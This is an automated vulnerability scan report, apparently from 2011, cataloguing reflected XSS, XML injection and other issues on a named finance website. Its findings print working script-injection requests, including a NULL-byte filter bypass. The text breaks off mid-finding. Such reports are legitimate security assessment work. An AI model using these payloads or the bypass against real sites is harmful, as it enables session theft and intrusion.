www.myfinances.com, XSS, Cross Site Scripting, CWE-79

XSS in www.myfinances.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:03:55 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]

1.3. http://www.myfinances.com/blog.html [page parameter]

1.4. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]

1.5. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]

1.6. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]

1.7. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]

1.8. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]

1.9. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]

1.10. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]

1.11. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]

1.12. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]

1.13. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]

1.14. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]

1.15. http://www.myfinances.com/budget.php [query parameter]

1.16. http://www.myfinances.com/budget.php [query parameter]

1.17. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]

2. XML injection

2.1. http://www.myfinances.com/solo [REST URL parameter 1]

2.2. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 1]

2.3. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 2]

2.4. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 3]

3. Cookie without HttpOnly flag set

4. Cross-domain Referer leakage

5. Cross-domain script include

5.1. http://www.myfinances.com/

5.2. http://www.myfinances.com/about.html

5.3. http://www.myfinances.com/blog.html

5.4. http://www.myfinances.com/blog/3171093.html

5.5. http://www.myfinances.com/blog/3171103.html

5.6. http://www.myfinances.com/blog/3227953.html

5.7. http://www.myfinances.com/blog/3227963.html

5.8. http://www.myfinances.com/blog/3241183.html

5.9. http://www.myfinances.com/blog/3241193.html

5.10. http://www.myfinances.com/blog/3299523.html

5.11. http://www.myfinances.com/blog/3299533.html

5.12. http://www.myfinances.com/blog/3299543.html

5.13. http://www.myfinances.com/blog/3299553.html

5.14. http://www.myfinances.com/budget.php

5.15. http://www.myfinances.com/calculator/2896373.html

5.16. http://www.myfinances.com/calculator/all.html

5.17. http://www.myfinances.com/college_prep.html

5.18. http://www.myfinances.com/contact.html

5.19. http://www.myfinances.com/credit_coach.html

5.20. http://www.myfinances.com/modules/calculators/java/resources/

5.21. http://www.myfinances.com/modules/facebox/images/

5.22. http://www.myfinances.com/privacy.html

5.23. http://www.myfinances.com/retirement_pro.html

5.24. http://www.myfinances.com/saving_machine.html

5.25. http://www.myfinances.com/terms.html

6. Email addresses disclosed

7. Private IP addresses disclosed

7.1. http://www.myfinances.com/budget.php

7.2. http://www.myfinances.com/budget.php

8. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 17 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:03:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:03:03 GMT
Content-Length: 17806
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/?af164"><script>alert(1)</script>bfea6dcd612=1" />
...[SNIP]...

1.2. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 17748

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1&page=1'>
...[SNIP]...

1.3. http://www.myfinances.com/blog.html [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:58 GMT
Content-Length: 17623
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?%007485b'><script>alert(1)</script>abffe3120a4&page=1'>
...[SNIP]...

1.4. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171093.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:23 GMT
Content-Length: 13431
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'">
...[SNIP]...

1.5. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171103.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:21 GMT
Content-Length: 13823
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'">
...[SNIP]...

1.6. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227953.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:13 GMT
Content-Length: 14027
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'">
...[SNIP]...

1.7. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227963.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:58 GMT
Content-Length: 13645
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'">
...[SNIP]...

1.8. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241183.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13681
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'">
...[SNIP]...

1.9. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241193.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 14125
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'">
...[SNIP]...

1.10. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299523.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
